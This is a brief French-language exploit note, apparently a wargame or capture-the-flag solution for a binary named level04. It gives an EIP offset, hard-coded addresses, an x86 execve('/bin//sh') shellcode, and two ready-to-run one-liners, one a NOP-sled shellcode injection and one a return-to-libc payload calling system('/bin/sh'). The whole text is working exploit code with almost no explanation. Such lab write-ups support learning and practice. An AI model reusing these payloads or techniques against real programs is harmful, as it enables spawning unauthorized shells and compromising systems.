buffer overflow sur EIP offset 156.

addresse of gets = 0xffffd660
=================================
shellcode = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80
=================================

cat <(python -c 'print("\x90" * 132 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80" + "\x60\xd6\xff\xff")') - | ./level04

Ret to libc :

EIP = 156
addr /bin/sh = 0xf7f897ec
addr system = 0xf7e6aed0

On remplit notre buffer puis on ecrase EIP par ladresse de system et on ecris 4 octet apres l'adresse de /bin/sh

(python -c 'print("\x90" * 156 + "\xd0\xae\xe6\xf7" + "HACK" + "\xec\x97\xf8\xf7")'; cat) | ./level04 
